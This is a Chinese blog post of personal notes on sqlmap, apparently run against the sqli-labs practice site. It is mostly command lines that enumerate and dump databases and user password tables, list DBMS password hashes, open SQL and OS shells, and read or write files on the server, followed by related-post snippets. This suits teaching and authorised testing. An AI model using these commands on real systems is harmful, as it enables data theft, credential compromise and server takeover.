sqlmap 基本使用教程--个人笔记

最新推荐文章于 2024-03-13 10:36:47 发布
最新推荐文章于 2024-03-13 10:36:47 发布
阅读量6.3k 收藏 68
点赞数 6
分类专栏: sql 注入应用及原理讲解 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46634468/article/details/120887609
版权

sqlmap 基本使用教程--个人笔记

一、sqlmap获取目标方式

1、指定目标url

sqlmap -u http://www.sqllab.com/Less-5/?id=1

2、从文件中获取多个url

sqlmap -m test.txt

3、从文件中加载HTTP请求

sqlmap -r url.txt

4、从burp日志中获取目标

sqlmap -l burp.txt

二、sqlmap测试命令举例:

-batch: 自动答复和判断,默认输入 Y 来进行下一步操作。
-dump:拖库命令。

网站使用GET请求方式

1、查看数据库名

sqlmap -u http://www.sqllab.com/Less-5/?id=1 -dbs -batch

2、查看 security 数据库中的表名

sqlmap -u http://www.sqllab.com/Less-5/?id=1 -D security -tables -batch

3、查看 security 数据库中 users 表中的字段名

sqlmap -u http://www.sqllab.com/Less-5/?id=1 -D security -T users -columns -batch

4、查看 security 数据库中 users 表中的所有数据信息

sqlmap -u http://www.sqllab.com/Less-5/?id=1 -D security -T users -C id,username,password -dump -batch

网站使用POST请求方式

1、查看数据库名

sqlmap -u http://www.sqllab.com/Less-15/ -data="uname=1&passwd=1&submit=Submit" -dbs -batch

2、查看 security 数据库中的表名

sqlmap -u http://www.sqllab.com/Less-15/ -data="uname=1&passwd=1&submit=Submit" -D security -tables -batch

3、查看 security 数据库中 users 表中的字段名

sqlmap -u http://www.sqllab.com/Less-15/ -data="uname=1&passwd=1&submit=Submit" -D security -T users -columns -batch

4、查看 security 数据库中 users 表中的所有数据信息

sqlmap -u http://www.sqllab.com/Less-15/ -data="uname=1&passwd=1&submit=Submit" -D security -T users -C id,username,password -dump -batch

用户权限

1、列出数据库管理系统用户

sqlmap -u http://www.sqllab.com/Less-5/?id=1 -users

2、查看当前连接数据库用户

sqlmap -u http://www.sqllab.com/Less-5/?id=1 -current-user

3、查看数据库用户所有密码

sqlmap -u http://www.sqllab.com/Less-5/?id=1 -passwords

4、判断当前用户是否是DBA

sqlmap -u http://www.sqllab.com/Less-5/?id=1 --is-dba

5、查看用户权限

sqlmap -u http://www.sqllab.com/Less-5/?id=1 -privileges

文件操作与shell提权

1、sql shell
直接获取一个sql shell,直接执行 sql 语句进行交互。

sqlmap -u http://www.sqllab.com/Less-5/?id=1 -sql-shell

在这里插入图片描述在这里插入图片描述

2、cmd shell
直接获取一个cmd shell,直接执行cmd命令进行交互。

sqlmap -u http://www.sqllab.com/Less-5/?id=1 --os-shell

在这里插入图片描述在这里插入图片描述在这里插入图片描述

3、读取服务器上指定文件

sqlmap -u http://www.sqllab.com/Less-5/?id=1 --file-read=C:/1.txt

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

4、写入本地文件到服务器上
注意:1、必须为dba权限;2、与 sqli-labs Less-7 原理相似

sqlmap -u http://www.sqllab.com/Less-5/?id=1 --file-write 1.txt --file-dest C:/phpstudy_pro/WWW/sqllab/1.txt

在这里插入图片描述

在这里插入图片描述在这里插入图片描述在这里插入图片描述

大大大蜜蜂
关注
  • 6
    点赞
  • 68
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
sqlmap-1.6.5-11 sql注入工具
SQLmap使用
BeatRex的博客
03-26 1141
一、确定目标 sqlmap -u "URL" 通过URL进行确定,GET方式时:此处为带参数的URL sqlmap -r 文件 结合Burpsuite抓包进行 首先设置代理访问网站,然后找到具体页面的请求包,将请求包选中右击创建文件 示例: 将上图创建好的文件放置桌面,起名为post sqlmap 通过-r参数选中 对于POST请求的,也可通过-u "URL" --cookie "访问网站...
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
03-13 1261
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。会清空之前的session,重新测试该目标。
sql注入——sqlmap的基础使用
qq_64875725的博客
04-21 334
-current-user #获取当前数据库用户名称。--users # 获取数据库用户。--passwords #获取数据库用户密码。--tables # 获取表。--dump #获取数据。--columns #获取字段名。--dbs #获取数据库。
SQLmap参数详解
Williamanddog的博客
01-19 5308
目标URL参数:-u或者--url 格式:http(s)://targeturl[:port]/[…] 例如:python sqlmap.py -u "从Burp或者WebScarab代理中获取日志 参数:-l 可以直接吧Burp proxy或者WebScarab proxy中的日志直接导出来交给sqlmap来一个一个检测是否有 注入。 从文本中获取多个目标扫描 参数:-m 文件中保存url,sqlmap会一个一个检测 从文件中加载HTTP请求 参数:-r。
sqlmap中的--sql-shell
qq_45751902的博客
10-25 6911
secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出。2、secure_file_priv 的值非NULL或包含了导出的绝对路径。outfile 和 dumpfile的路径不支持hex,必须有引号包裹。4、mysql连接用户有FILE权限/ROOT用户或ROOT权限。Mysql>=5.5.53 默认为NULL,即默认禁止导入导出。3、mysql服务有对网站可访问路径的写权限。5、GPC关闭//未对闭合用的引号转义。1、网站可访问路径的绝对路径。
sqlmap使用方法
08-26
sqlmap -p 指定测试参数 -b 获取banner --dbs 列举数据库 --is-dba 是否是管理员权限 --current-db 当前数据库 --current-user 当前用户 --tables 列举数据库的表名 --count 检索所有条目数 --columns 获取表的列名 --dump 获取表中的数据,包含列 --dump-all 转存DBMS数据库所有表项目 --level 测试等级(1-5),默认为1 -v 显示详细信息 读取数据库--->读取表---->读取表的列---->获取内容
Sqlmap使用教程
B-Tree
02-24 3694
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。   sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的
Sqlmap使用方法
w1304099880的博客
10-26 1204
sqlmap是一个非常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦。我们要了解这些语句。如下: 检查注入点: sqlmap-uhttp://ooxx.com.tw/star_photo.php?artist_id=11 爆所有数据库信息: sqlmap-uhttp://ooxx.com.tw/star_photo.php?artist_id=11--...
sqlmap使用教程
热门推荐
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
SQLMAP简单使用教程
一只web狗
06-21 1257
SQLMAP简单使用教程
SqlMap使用
06-24
本文档详细介绍了SqlMap使用教程,SQL注入攻击是黑客对数据库进行攻击的常用手段之一
sqlmap使用大全
11-25
sqlmap使用大全,帮助使用aqlmap,非常有用的一个文档
SQLMAP使用笔记.pdf
01-25
SQLMAP使用笔记
sqlmap-1.4.5.zip
05-22
sqlmap-1.4.5,亲爱的朋友,SQLMAP是自动化的SQL注入和数据库接管工具,是开源的渗透测试工具,它能自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的...
第十节 Sqlmap注入参数1-01
09-15
第十节 Sqlmap注入参数1-01
第三节 Sqlmap 请求参数设置-01
09-15
第三节 Sqlmap 请求参数设置-01
sqlmap mysql shell_利用SQLmap 拿服务器shell
weixin_39528525的博客
01-27 2255
1、简介sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是:1)基于布尔的盲注...
sqlmap 使用指南
海纳百川
05-19 342
sqlmap 使用指南 一、命令参数 1. 通用 参数 功能 -h 显示基本帮助信息 -hh 显示高级帮助信息 –version 显示版本号 -s sqlite 会话文件保存位置 -t 记录所有 HTTP 流量到指定文件中 –batch 测试过程中, 执行所有默认配置 –charset 强制用于数据检索的字符编码 –crawl 从目标URL开始爬取网站 –crawl-exclude 禁止爬取某个页面(eg:logout) –csv-del 指定CSV输出中
sqlmap使用教程sqli-labs
07-30
sqlmap是一款用于自动化SQL注入的工具,可以帮助安全测试人员发现和利用Web应用程序中的SQL注入漏洞。在使用sqlmap之前,需要先了解一些基本的语法。 首先,使用sqlmap进行数据库探测和表探测的语法如下: - 数据库探测:sqlmap -u "url" -D '数据库名' --tables - 表探测:sqlmap -u "url" -D '数据库名' -T '表名' --columns 其中,url是目标网站的URL地址,数据库名是要探测的数据库名称,表名是要探测的表名称。 举个例子,如果要使用sqlmap对sqli-labs进行数据库和表的探测,可以使用以下命令: - 数据库探测:sqlmap -u "http://192.168.0.6/sqli-labs-master/Less-1/?id=1" --current-db - 表探测:sqlmap -u "http://192.168.0.6/sqli-labs-master/Less-1/?id=1" -D security --tables 在上述命令中,--current-db参数用于获取当前数据库的名称,--tables参数用于获取指定数据库中的所有表的名称。 希望以上信息对您有所帮助。如果还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值